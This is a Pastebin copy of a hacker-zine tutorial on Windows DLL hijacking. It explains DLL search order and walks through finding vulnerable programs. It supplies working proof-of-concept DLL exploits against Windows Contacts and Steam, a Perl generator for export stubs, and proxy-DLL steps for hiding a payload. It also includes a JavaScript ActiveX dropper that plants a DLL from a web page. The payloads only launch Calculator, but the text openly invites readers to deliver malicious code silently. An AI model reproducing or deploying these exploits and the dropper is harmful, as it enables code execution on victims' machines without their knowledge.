API tools faq
paste
Guest User

Untitled

a guest
Mar 23rd, 2011
767
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.86 KB | None | 0 0
raw download clone embed print report
  1. -=[ 0x06 Practical DLL Hijacking
  2. -=[ Author: storm
  3.  
  4. -=[ Email: [email protected]
  5. -=[ Website: http://gonullyourself.org/
  6.  
  7.  
  8. Table of Contents
  9. I. Introduction
  10. II. Threat or No Threat?
  11. III. Background on DLL Hijacking
  12. IV. Developing a Proof of Concept
  13. V. Real-World Attack Examples
  14. VI. Omg Hax
  15.  
  16. I. Introduction
  17. ===============
  18.  
  19. A recent craze has been forming over a new attack vector known as "DLL hijacking." This paper is
  20. meant to inform the reader about what exactly this attack vector is, how it works, and how to
  21. develop a proof of concept exploit for it. I will also be covering some more advanced topics, such
  22. as how DLL hijacking may be used in a practical manner to deliver malicious payloads, and I will
  23. also introduce a new utilization of this attack to silently execute code on a remote system.
  24.  
  25. II. Threat or No Threat?
  26. ========================
  27.  
  28. There has been a lot of discussion about whether or not DLL hijacking actually presents any sort of
  29. security risk, and at first look, one may agree that these concerns hold some merit. In a typical
  30. scenario, an attacker would already need to possess a significant level of access to the target
  31. machine and its filesystem in order to perform a hijack, so the question remains that if such a
  32. level of access has already been achieved, then why would time and resources be wasted on a DLL
  33. hijack? Instead, an attacker would probably have the power to simply tamper with the targeted
  34. program itself or execute a downloaded binary with the same user permissions.
  35.  
  36. If an average DLL hijacking scenario doesn't grant escalated privileges to an attacker, then what
  37. the heck use is it? DLL hijacking is appropriate in situations where an attacker does not have
  38. actual interactive access to a target system but is still able to pass files to it, such as when a
  39. user downloads content through BitTorrent or plugs in a USB thumb drive. In both of these
  40. situations, DLL files may be planted on a system in specific relation to other key files in the
  41. absence of the attacker maintaining any interactive access to the machine at all. When executed
  42. properly, this attack is very effective and very dangerous. DLL hijacking won't bring about the
  43. destruction of all computing as the media generally makes any vulnerability out to be (I'm assuming
  44. it won't), but it certainly has its place as a valid security concern that must be addressed.
  45.  
  46. In any regard, the vendors seem to be taking it seriously:
  47.  
  48. From: "Adobe PSIRT" <[email protected]>
  49. Subject: Adobe Report
  50. Date: Mon, August 30, 2010 11:26 am
  51. To: "[email protected]" <[email protected]>
  52. Cc: "Adobe PSIRT" <[email protected]>
  53.  
  54. Hello sToRm,
  55.  
  56. We noticed you posted a report on the Exploit database about an issue affecting an
  57. Adobe product: Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll),
  58. http://www.exploit-db.com/exploits/14741. We are currently investigating how to
  59. resolve the issue. We definitely appreciate your feedback about the security of our
  60. products, and encourage you to contact us directly in the event you find any further
  61. issues, or have additional information you would like to share about the issue
  62. already reported. Please contact us at [email protected].
  63.  
  64. Thank you very much,
  65. Wendy
  66. Adobe Product Security Incident Response Team
  67.  
  68. III. Background on DLL Hijacking
  69. ================================
  70.  
  71. First, let's answer the question of what a DLL file is. Basically, DLL files (the acronym stands
  72. for "dynamic-link library") are Windows's version of shared libraries, which are packages of
  73. different subroutines that grant greater functionality to programs. Directly quoting a Microsoft
  74. article, "For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box
  75. related functions." Numerous DLL files exist, each providing unique functionality. To cite another
  76. example, when loaded by a program, the wsock32.dll file offers an interface to the Windows Sockets
  77. API.
  78.  
  79. Above, I mentioned that DLL files are shared libraries, not static libraries. This is a key piece
  80. of information in the context of our attack. To further explain, shared libraries are loaded at
  81. run-time, unlike static libraries which are loaded at compile-time. The functionality provided by
  82. static libraries is compiled directly into the binary itself, whereas the functionality provided by
  83. shared libraries is compiled separately and copied into memory once loaded by the program. By using
  84. shared libraries, the overall program size decreases since the executable is only storing a table of
  85. required functions instead of the actual functions themselves. This process is referred to as
  86. dynamic linking.
  87.  
  88. Dynamic linking offers many advantages over static linking (which you may have figured the
  89. definition of already), just as static linking offers many advantages over dynamic linking. For
  90. instance, as previously stated, dynamic linking decreases the overall size of the final executable.
  91. Shared libraries may also be easily updated without the need for recompiling the affected program.
  92. Additionally, dynamic linking promotes the reusage of code and allows such libraries to be called
  93. upon by multiple programs at the same time. Quoting the book "An Introduction to GCC: for the GNU
  94. compilers gcc and g++," "Most operating systems also provide a virtual memory mechanism which allows
  95. one copy of a shared library in physical memory to be used by all running programs, saving memory as
  96. well as disk space." Dynamic linking provides both efficient usage of resources and flexibility in
  97. programming.
  98.  
  99. This flexibility, however, is what causes programs to be vulnerable to DLL hijacking. When
  100. specifying a DLL file to be loaded by a program, a programmer has various options. First, s/he may
  101. call the library using an absolute path, such as "C:\Windows\system32\wsock32.dll". Second, s/he
  102. may call the library using a relative path, such as "..\..\Windows\system32\wsock32.dll". Third,
  103. s/he may call the library simply by defining "wsock32.dll" with no path. This third option is of
  104. particular interest to us due to the way Windows attempts to locate DLL files with no definite
  105. path.
  106.  
  107. The following lists are from various Microsoft KB articles and the ACROS Security Blog. Asterisks
  108. denote families of functions.
  109.  
  110. When the LoadLibrary* functions are evoked, the following locations are searched for the requested
  111. file:
  112.  
  113. 1. The directory from which the application loaded
  114. 2. The system directory
  115. 3. The 16-bit system directory
  116. 4. The Windows directory
  117. 5. The current working directory (CWD)
  118. 6. The directories that are listed in the PATH environment variable
  119.  
  120. When the SeachPath, CreateProcess*, and LoadModule functions are evoked, the following locations are
  121. searched for the requested file:
  122.  
  123. 1. The directory from which the application loaded
  124. 2. The current working directory (CWD)
  125. 3. The system directory
  126. 4. The 16-bit system directory
  127. 5. The Windows directory
  128. 6. The directories that are listed in the PATH environment variable
  129.  
  130. When the ShellExecute* functions are evoked, the following locations are searched for the requested
  131. file:
  132.  
  133. 1. The current working directory (CWD)
  134. 2. The 32-bit System directory (Windows\System32)
  135. 3. The 16-bit System directory (Windows\System)
  136. 4. The Windows directory (Windows)
  137. 5. The directories in the PATH environment variable
  138. 6. The directories specified in the App Paths registry key
  139.  
  140. When the WinExec function is evoked, the following locations are searched for the requested file:
  141.  
  142. 1. The directory from which the application loaded.
  143. 2. The current working directory (CWD)
  144. 3. The Windows system directory. The GetSystemDirectory function retrieves the path of this
  145. directory.
  146. 4. The Windows directory. The GetWindowsDirectory function retrieves the path of this
  147. directory.
  148. 5. The directories listed in the PATH environment variable.
  149.  
  150. When the _spawn*p* and _exec*p* functions are evoked, the following locations are searched for the
  151. requested file:
  152.  
  153. 1. The current working directory (CWD)
  154. 2. The 32-bit system directory (Windows\System32)
  155. 3. The Windows directory (Windows)
  156. 4. The directories in the PATH environment variable
  157.  
  158. You may have already formulated an idea about what can happen here. If a DLL file is loaded by
  159. means of the third path, then there is a good chance that the load function is searching a few other
  160. directories before finding it. If an attacker places a DLL file containing malicious code in a
  161. directory that is searched before the correct one is, then it will be loaded (with privileges of the
  162. calling progam) instead of the real DLL, leading to arbitrary code execution. This is a DLL
  163. hijacking attack.
  164.  
  165. IV. Developing a Proof of Concept
  166. =================================
  167.  
  168. It is fairly simple to develop a working exploit for DLL hijacking. In this section, I will guide
  169. you through the process of finding a vulnerable application, identifying hijackable DLL files, and
  170. creating your own DLL files to be hijacked. For the scope of this tutorial, I will target
  171. Microsoft's Windows Contacts program (tested on Vista SP2 and 7 Ultimate).
  172.  
  173. First, download and extract Process Monitor (available at [1]), which we will use to track the
  174. filesystem activity of Windows Contacts. After opening it, add the following filters:
  175.  
  176. Process Name is wab.exe then Include
  177. Path ends with .dll then Include
  178. Result is NAME NOT FOUND then Include
  179.  
  180. Doing this restricts the program's output just to what we are interested in (requests to load
  181. nonexistent DLL files by wab.exe).
  182.  
  183. Create an empty file named "test.wab", where .wab is a file extension associated with Windows
  184. Contacts. Double-click on test.wab, which will open the Windows Contacts program. Scrolling down,
  185. you should see something similar to the following events:
  186.  
  187. wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
  188. wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
  189. wab.exe CreateFile C:\Windows\system\wab32res.dll NAME NOT FOUND
  190. wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
  191. wab.exe CreateFile C:\Users\storm\Desktop\New Folder\Windows Contacts\wab32res.dll NAME NOT FOUND
  192. wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
  193. wab.exe CreateFile C:\Perl\site\bin\wab32res.dll NAME NOT FOUND
  194. wab.exe CreateFile C:\Perl\bin\wab32res.dll NAME NOT FOUND
  195. wab.exe CreateFile C:\Program Files\PHP\wab32res.dll NAME NOT FOUND
  196. wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
  197. wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
  198. wab.exe CreateFile C:\Windows\System32\wbem\wab32res.dll NAME NOT FOUND
  199. wab.exe CreateFile C:\Windows\System32\WindowsPowerShell\v1.0\wab32res.dll NAME NOT FOUND
  200. wab.exe CreateFile C:\Windows\wbin\wab32res.dll NAME NOT FOUND
  201. wab.exe CreateFile C:\Program Files\Nmap\wab32res.dll NAME NOT FOUND
  202.  
  203. This string of failed attempts to load a single DLL file is what we are looking for. First, the
  204. directory that wab.exe was executed from is checked for wab32res.dll, where it is not found. Next,
  205. it checks three Windows directories, where it is also not found. Then, it checks the current
  206. working directory (where the .wab file was loaded from), and then, finally, it enumerates PATH as a
  207. last resort. By observing this trend, we can assume that the program attempts to load wab32res.dll
  208. using either the LoadLibrary or LoadLibraryEx method.
  209.  
  210. In case you are interested, by removing the "NAME NOT FOUND" filter, you can see all requests to
  211. load DLL files, successful or not. By doing so, we can see that Windows Contacts was ultimately
  212. successful in loading wab32res.dll a little further down:
  213.  
  214. wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
  215. wab.exe QueryBasicInformationFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
  216. wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
  217. wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
  218. wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll FILE LOCKED WITHONLY
  219. READERS
  220. wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll SUCCESS
  221. wab.exe Load Image C:\Program Files\Common Files\System\wab32res.dll SUCCESS
  222. wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
  223.  
  224. So, now that we've identified wab32res.dll as a viable point of attack, the next step is to craft
  225. our own DLL file. Since we've deduced that the DLL file is being loaded with one of the LoadLibrary
  226. functions, we can employ the help of the DllMain callback function. We know this because, according
  227. to [2], "When the system starts or terminates a process or thread, it calls the entry-point function
  228. for each loaded DLL using the first thread of the process. The system also calls the entry-point
  229. function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions."
  230. This means that the contents of DllMain() in our code will be executed upon loading of the DLL
  231. file.
  232.  
  233. The following code is directly from the KB article just mentioned:
  234.  
  235. BOOL WINAPI DllMain(
  236. __in HINSTANCE hinstDLL,
  237. __in DWORD fdwReason,
  238. __in LPVOID lpvReserved
  239. );
  240.  
  241. So let's use this code and actually make it do something. The classic proof of concept is to
  242. execute Calculator:
  243.  
  244. /*
  245.  
  246. Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
  247. Date: August 25, 2010
  248. Author: storm ([email protected])
  249. Tested on: Windows Vista SP2
  250.  
  251. http://www.gonullyourself.org/
  252.  
  253. gcc -shared -o wab32res.dll Contacts-DLL.c
  254.  
  255. .contact, .group, .p7c, .vcf, and .wab files are affected.
  256.  
  257. */
  258.  
  259. #include <windows.h>
  260.  
  261. int hax()
  262. {
  263. WinExec("calc", 0);
  264. exit(0);
  265. return 0;
  266. }
  267.  
  268. BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
  269. {
  270. hax();
  271. return 0;
  272. }
  273.  
  274. Here, we have the DllMain() function call hax(), which simply executes calc.exe and exits. In case
  275. you're wondering, you can determine which file extensions are associated with which programs through
  276. Control Panel > Default Programs.
  277.  
  278. Compile and put your new wab32res.dll in the same directory as any .contact, .group, .p7c, .vcf, or
  279. .wab file. The file can be empty - just as long as it has one of those file extensions. Open the
  280. file, and you should see a Calculator window open. :)
  281.  
  282. We are done with the proof of concept process for this program. However, if the targeted program
  283. does not load a DLL using a LoadLibrary function, then we are not able to use DllMain() to execute
  284. our code. If this is the case, then we must construct our new DLL file in a different manner. We
  285. must create a template of every export function provided by the real DLL file, but instead of the
  286. actual functionality, each function simple runs our hax() function.
  287.  
  288. For this example, I will use rpawinet.dll, which is loaded insecurely by Live! Cam Avatar Creator
  289. (CrazyTalk4 for short). It's essentially some useless program that came pre-installed on my
  290. computer, so I figured I would utilize it somehow.
  291.  
  292. First, download and extract DLL Export Viewer from [3]. Run the program, and load the DLL file you
  293. wish to examine (in this case, rpawinet.dll). A list of the export functions should display in the
  294. window. Ctrl+A to select all, and Ctrl+S to save to a text file. The contents of the text file
  295. should look something like:
  296.  
  297. ==================================================
  298. Function Name : HttpFilterBeginningTransaction
  299. Address : 0x100011d0
  300. Relative Address : 0x000011d0
  301. Ordinal : 1 (0x1)
  302. Filename : rpawinet.dll
  303. Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
  304. Type : Exported Function
  305. ==================================================
  306.  
  307. ==================================================
  308. Function Name : HttpFilterClose
  309. Address : 0x100011dd
  310. Relative Address : 0x000011dd
  311. Ordinal : 2 (0x2)
  312. Filename : rpawinet.dll
  313. Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
  314. Type : Exported Function
  315. ==================================================
  316.  
  317. ==================================================
  318. Function Name : HttpFilterOnBlockingOps
  319. Address : 0x100011ea
  320. Relative Address : 0x000011ea
  321. Ordinal : 3 (0x3)
  322. Filename : rpawinet.dll
  323. Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
  324. Type : Exported Function
  325. ==================================================
  326.  
  327. ==================================================
  328. Function Name : HttpFilterOnResponse
  329. Address : 0x100011f7
  330. Relative Address : 0x000011f7
  331. Ordinal : 4 (0x4)
  332. Filename : rpawinet.dll
  333. Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
  334. Type : Exported Function
  335. ==================================================
  336.  
  337. ==================================================
  338. Function Name : HttpFilterOnTransactionComplete
  339. Address : 0x10001204
  340. Relative Address : 0x00001204
  341. Ordinal : 5 (0x5)
  342. Filename : rpawinet.dll
  343. Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
  344. Type : Exported Function
  345. ==================================================
  346.  
  347. ==================================================
  348. Function Name : HttpFilterOpen
  349. Address : 0x10001211
  350. Relative Address : 0x00001211
  351. Ordinal : 6 (0x6)
  352. Filename : rpawinet.dll
  353. Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
  354. Type : Exported Function
  355. ==================================================
  356.  
  357. Using a simple Perl script, we can enumerate the function names in this text file and output them in
  358. correct format for our DLL source.
  359.  
  360. use strict;
  361. use warnings;
  362.  
  363. open FILE, '<', @ARGV or die $!;
  364.  
  365. print "#include <windows.h>\n#define DllExport __declspec (dllexport)\n\n";
  366.  
  367. while (<FILE>) {
  368.  
  369. print "DllExport void $1() { hax(); }\n" if ($_ =~ /Function Name\s+: (\w+)/);
  370.  
  371. };
  372.  
  373. print "\nint hax()\n{\n WinExec(\"calc\", 0);\n exit(0);\n return 0;\n}";
  374.  
  375. This should output:
  376.  
  377. #include <windows.h>
  378. #define DllExport __declspec (dllexport)
  379.  
  380. DllExport void HttpFilterBeginningTransaction() { hax(); }
  381. DllExport void HttpFilterClose() { hax(); }
  382. DllExport void HttpFilterOnBlockingOps() { hax(); }
  383. DllExport void HttpFilterOnResponse() { hax(); }
  384. DllExport void HttpFilterOnTransactionComplete() { hax(); }
  385. DllExport void HttpFilterOpen() { hax(); }
  386.  
  387. int hax()
  388. {
  389. WinExec("calc", 0);
  390. exit(0);
  391. return 0;
  392. }
  393.  
  394. I think you know what to do from here. :)
  395.  
  396. If you are interested, HD Moore has written a DLL hijacking auditing kit that automates checking
  397. every associated file extension on one's computer to find potential program vulnerabilities. You
  398. can find this tool at [4].
  399.  
  400. V. Real-World Attack Examples
  401. =============================
  402.  
  403. There are many avenues for DLL hijacking that turn a number of seemingly safe activities into
  404. potential security threats. I myself will not go too deeply into this section simply because other
  405. articles have done a good job describing the vulnerable scenarios, so I will instead provide a guide
  406. to these resources.
  407.  
  408. The article "Exploiting DLL Hijack in the real world" at [5] (mirror: [6]) provides a few good
  409. examples of possible attack scenarios. The main points of the article are "Using a SMB/WebDav
  410. shared folder," "A compressed package (.zip, .tar.gz, .rar etc)," "Torrents," and "Exploiting
  411. multiple application hijacks."
  412.  
  413. The article "New DLL Hijacking Exploits (many!)" at [7] steps through an example WebDAV attack using
  414. Metasploit. "Autorun DLL Hijacker (USB stick)" at [8] attempts to compormise a system through the
  415. AutoRun feature of USB thumb drives.
  416.  
  417. On another note, we only covered creating proof of concept DLLs that don't really do much. Also,
  418. since we are either removing the functionality of the export functions or the actual export
  419. functions themselves, the hijacked program is going to crash if we remove the "exit(0);" line.
  420. Let's learn how to execute our payload while still maintaining the functionality of the original DLL
  421. file, effectively creating a silent attack.
  422.  
  423. We will achieve this through the use of a "proxy DLL." A proxy DLL is exactly what it sounds like -
  424. a DLL file that acts as an intermediary to another DLL file. These are used to intercept and alter
  425. program calls, most commonly to add "extra functionality" to games. For this quick section, I'll be
  426. referencing the article [9] as our method of creating proxy DLL files. The source wrappit.cpp [10]
  427. is provided by the article to automate the process, which you can instead download from [11] to
  428. avoid the mandatory registration bullshit.
  429.  
  430. As I am still unfamiliar with the true power of proxy DLLs, I will only introduce you to this
  431. concept and recommend you to guide yourself through the process by reading the documentation linked
  432. above. The CodeProject article does a pretty good job explaining how to use the tool. Make sure
  433. that the appropriate development environment is installed (I am using Microsoft Visual C++ Express).
  434. I will use the example wsock32.dll as in the article:
  435.  
  436. C:\Users\storm\Desktop\src>"C:\Program Files\Microsoft Visual Studio 10.0\VC\bin\vcvars32.bat"
  437. Setting environment for using Microsoft Visual Studio 2010 x86 tools.
  438.  
  439. C:\Users\storm\Desktop\src>dumpbin /exports C:\Windows\System32\wsock32.dll > exports.txt
  440.  
  441. C:\Users\storm\Desktop\src>type exports.txt
  442. Microsoft (R) COFF/PE Dumper Version 10.00.30319.01
  443. Copyright (C) Microsoft Corporation. All rights reserved.
  444.  
  445.  
  446. Dump of file C:\Windows\System32\wsock32.dll
  447.  
  448. File Type: DLL
  449.  
  450. Section contains the following exports for WSOCK32.dll
  451.  
  452. 00000000 characteristics
  453. 4A5BC955 time date stamp Mon Jul 13 19:55:01 2009
  454. 0.00 version
  455. 1 ordinal base
  456. 1142 number of functions
  457. 75 number of names
  458.  
  459. ordinal hint RVA name
  460.  
  461. 1141 0 AcceptEx (forwarded to MSWSOCK.AcceptEx)
  462. 1111 1 EnumProtocolsA (forwarded to MSWSOCK.EnumProtocolsA)
  463. 1112 2 EnumProtocolsW (forwarded to MSWSOCK.EnumProtocolsW)
  464. 1142 3 GetAcceptExSockaddrs (forwarded to MSWSOCK.GetAcceptExSockaddrs)
  465. 1109 4 GetAddressByNameA (forwarded to MSWSOCK.GetAddressByNameA)
  466. 1110 5 GetAddressByNameW (forwarded to MSWSOCK.GetAddressByNameW)
  467. 1115 6 GetNameByTypeA (forwarded to MSWSOCK.GetNameByTypeA)
  468. 1116 7 GetNameByTypeW (forwarded to MSWSOCK.GetNameByTypeW)
  469. 1119 8 GetServiceA (forwarded to MSWSOCK.GetServiceA)
  470. 1120 9 GetServiceW (forwarded to MSWSOCK.GetServiceW)
  471. 1113 A GetTypeByNameA (forwarded to MSWSOCK.GetTypeByNameA)
  472. 1114 B GetTypeByNameW (forwarded to MSWSOCK.GetTypeByNameW)
  473. 24 C MigrateWinsockConfiguration (forwarded to MSWSOCK.MigrateWinsockConfigurat
  474. ion)
  475. 1130 D NPLoadNameSpaces (forwarded to MSWSOCK.NPLoadNameSpaces)
  476. 1117 E SetServiceA (forwarded to MSWSOCK.SetServiceA)
  477. 1118 F SetServiceW (forwarded to MSWSOCK.SetServiceW)
  478. 1140 10 TransmitFile (forwarded to MSWSOCK.TransmitFile)
  479. 500 11 WEP (forwarded to ws2_32.WEP)
  480. 102 12 WSAAsyncGetHostByAddr (forwarded to ws2_32.WSAAsyncGetHostByAddr)
  481. 103 13 WSAAsyncGetHostByName (forwarded to ws2_32.WSAAsyncGetHostByName)
  482. 105 14 WSAAsyncGetProtoByName (forwarded to ws2_32.WSAAsyncGetProtoByName)
  483. 104 15 WSAAsyncGetProtoByNumber (forwarded to ws2_32.WSAAsyncGetProtoByNumber)
  484. 107 16 WSAAsyncGetServByName (forwarded to ws2_32.WSAAsyncGetServByName)
  485. 106 17 WSAAsyncGetServByPort (forwarded to ws2_32.WSAAsyncGetServByPort)
  486. 101 18 WSAAsyncSelect (forwarded to ws2_32.WSAAsyncSelect)
  487. 108 19 WSACancelAsyncRequest (forwarded to ws2_32.WSACancelAsyncRequest)
  488. 113 1A WSACancelBlockingCall (forwarded to ws2_32.WSACancelBlockingCall)
  489. 116 1B WSACleanup (forwarded to ws2_32.WSACleanup)
  490. 111 1C WSAGetLastError (forwarded to ws2_32.WSAGetLastError)
  491. 114 1D WSAIsBlocking (forwarded to ws2_32.WSAIsBlocking)
  492. 1107 1E WSARecvEx (forwarded to MSWSOCK.WSARecvEx)
  493. 109 1F WSASetBlockingHook (forwarded to ws2_32.WSASetBlockingHook)
  494. 112 20 WSASetLastError (forwarded to ws2_32.WSASetLastError)
  495. 115 21 WSAStartup (forwarded to ws2_32.WSAStartup)
  496. 110 22 WSAUnhookBlockingHook (forwarded to ws2_32.WSAUnhookBlockingHook)
  497. 1000 23 WSApSetPostRoutine (forwarded to ws2_32.WSApSetPostRoutine)
  498. 151 24 __WSAFDIsSet (forwarded to ws2_32.__WSAFDIsSet)
  499. 1 25 accept (forwarded to ws2_32.accept)
  500. 2 26 bind (forwarded to ws2_32.bind)
  501. 3 27 closesocket (forwarded to ws2_32.closesocket)
  502. 4 28 connect (forwarded to ws2_32.connect)
  503. 1106 29 dn_expand (forwarded to MSWSOCK.dn_expand)
  504. 51 2A gethostbyaddr (forwarded to ws2_32.gethostbyaddr)
  505. 52 2B gethostbyname (forwarded to ws2_32.gethostbyname)
  506. 57 2C gethostname (forwarded to ws2_32.gethostname)
  507. 1101 2D getnetbyname (forwarded to MSWSOCK.getnetbyname)
  508. 5 2E getpeername (forwarded to ws2_32.getpeername)
  509. 53 2F getprotobyname (forwarded to ws2_32.getprotobyname)
  510. 54 30 getprotobynumber (forwarded to ws2_32.getprotobynumber)
  511. 55 31 getservbyname (forwarded to ws2_32.getservbyname)
  512. 56 32 getservbyport (forwarded to ws2_32.getservbyport)
  513. 6 33 getsockname (forwarded to ws2_32.getsockname)
  514. 7 34 0000186E getsockopt
  515. 8 35 htonl (forwarded to ws2_32.htonl)
  516. 9 36 htons (forwarded to ws2_32.htons)
  517. 10 37 inet_addr (forwarded to ws2_32.inet_addr)
  518. 1100 38 inet_network (forwarded to MSWSOCK.inet_network)
  519. 11 39 inet_ntoa (forwarded to ws2_32.inet_ntoa)
  520. 12 3A ioctlsocket (forwarded to ws2_32.ioctlsocket)
  521. 13 3B listen (forwarded to ws2_32.listen)
  522. 14 3C ntohl (forwarded to ws2_32.ntohl)
  523. 15 3D ntohs (forwarded to ws2_32.ntohs)
  524. 1102 3E rcmd (forwarded to MSWSOCK.rcmd)
  525. 16 3F 000017A8 recv
  526. 17 40 00001808 recvfrom
  527. 1103 41 rexec (forwarded to MSWSOCK.rexec)
  528. 1104 42 rresvport (forwarded to MSWSOCK.rresvport)
  529. 1108 43 s_perror (forwarded to MSWSOCK.s_perror)
  530. 18 44 select (forwarded to ws2_32.select)
  531. 19 45 send (forwarded to ws2_32.send)
  532. 20 46 sendto (forwarded to ws2_32.sendto)
  533. 1105 47 sethostname (forwarded to MSWSOCK.sethostname)
  534. 21 48 000018E0 setsockopt
  535. 22 49 shutdown (forwarded to ws2_32.shutdown)
  536. 23 4A socket (forwarded to ws2_32.socket)
  537.  
  538. Summary
  539.  
  540. 1000 .data
  541. 1000 .reloc
  542. 1000 .rsrc
  543. 3000 .text
  544.  
  545. C:\Users\storm\Desktop\src>g++ wrappit.cpp -o wrappit.exe
  546.  
  547. C:\Users\storm\Desktop\src>wrappit.exe wsock32.dll exports.txt __stdcall C:\\Windows\\System32\\wsoc
  548. k32.dll wsock32.cpp wsock32.def
  549. Wrappit. Copyright (C) Chourdakis Michael
  550. Usage: WRAPPIT <dll> <txt> <convention> <new dll name> <cpp> <def>
  551. ==================================================================
  552. Step 1: Parsing exports.txt...
  553. Step 1: 75 exported functions parsed.
  554. ------------------------------------------
  555. Step 2: Generating .DEF file wsock32.def...
  556. Step 2: 75 exported functions written to DEF.
  557. ------------------------------------------
  558. Step 3: Generating .CPP file wsock32.cpp...
  559. cl : Command line warning D9035 : option 'Wp64' has been deprecated and will be removed in a future
  560. release
  561. wsock32.cpp
  562. Creating library wsock32.lib and object wsock32.exp
  563. Generating code
  564. Finished generating code
  565.  
  566. C:\Users\storm\Desktop\src>
  567.  
  568. And this is where I will leave you. :)
  569.  
  570. VI. Omg Hax
  571. ===========
  572.  
  573. Many flaws in web browsers allow files to be downloaded to a victim's computer but not executed
  574. (arbitrary file download), leaving the attacker hoping that it's opened either intentionally or
  575. accidentally. With DLL hijacking, exploits such as these do not have to rely on a user directly
  576. interacting with the file, which usually leads to exposure of an attack. Instead, a malicious DLL
  577. file targeting a popular program may be dropped to a location that will be searched before the
  578. actual, legitimate DLL is found. Or, in a case like this, where the actual DLL is missing
  579. altogether:
  580.  
  581. /*
  582.  
  583. Exploit Title: Steam DLL Hijacking Exploit (steamgamesupport.dll)
  584. Date: August 25, 2010
  585. Author: storm ([email protected])
  586. Tested on: Windows Vista SP2
  587.  
  588. http://www.gonullyourself.org/
  589.  
  590. gcc -shared -o steamgamesupport.dll Steam-DLL.c
  591.  
  592. For whatever ungodly reason, Steam searches PATH for steamgamesupport.dll but never finds it.
  593. Shall we help it?
  594.  
  595. */
  596.  
  597. #include <windows.h>
  598.  
  599. int hax()
  600. {
  601. WinExec("calc", 0);
  602. exit(0);
  603. return 0;
  604. }
  605.  
  606. BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
  607. {
  608. hax();
  609. return 0;
  610. }
  611.  
  612. The following code, provided by SubSyn, acts as a basic example of a file dropper. It will produce
  613. one script warning when executed. The code with no script warnings will remain unreleased. :)
  614.  
  615. <html>
  616. <head></head>
  617. <body>
  618. <script language="javascript">
  619. var fso = new ActiveXObject("Scripting.FileSystemObject");
  620. var myfile = fso.CreateTextFile("C:\\Program Files\\Steam\\steamgamesupport.dll",true);
  621. myfile.WriteLine("compiled DLL contents");
  622. myfile.Close();
  623. document.location='http://www.intel.com';
  624. </script>
  625. </body>
  626. </html>
  627.  
  628.  
  629. [1] http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
  630. [2] http://msdn.microsoft.com/en-us/library/ms682583%28VS.85%29.aspx
  631. [3] http://www.nirsoft.net/utils/dll_export_viewer.html
  632. [4] http://blog.metasploit.com/2010/08/better-faster-stronger.html
  633. [5] http://digitalacropolis.us/?p=113
  634. [6] http://www.exploit-db.com/papers/14813/
  635. [7] http://www.attackvector.org/new-dll-hijacking-exploits-many/
  636. [8] http://www.attackvector.org/autorun-dll-hijacker-usb-stick/
  637. [9] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs.aspx
  638. [10] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs/src.zip
  639. [11] http://gonullyourself.org/downloads/wrappit.cpp
  640. [12] http://support.microsoft.com/kb/815065
  641. [13] http://www.network-theory.co.uk/docs/gccintro/gccintro_25.html
  642. [14] http://kb.iu.edu/data/akqn.html
  643. [15] http://support.microsoft.com/kb/2389418
  644. [16] http://www.microsoft.com/technet/security/advisory/2269637.mspx
  645. [17] http://support.microsoft.com/kb/2264107
  646. [18] http://www.cs.ucdavis.edu/research/tech-reports/2010/CSE-2010-2.pdf
  647. [19] http://blog.acrossecurity.com/2010/09/binary-planting-goes-exe.html
  648. [20] http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx
  649. [21] http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx
  650. [22] http://msdn.microsoft.com/en-us/library/ms684183%28VS.85%29.aspx
  651. [23] http://msdn.microsoft.com/en-us/library/20y988d2%28v=VS.80%29.aspx
  652. [24] http://msdn.microsoft.com/en-us/library/431x4c1w%28VS.80%29.aspx
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!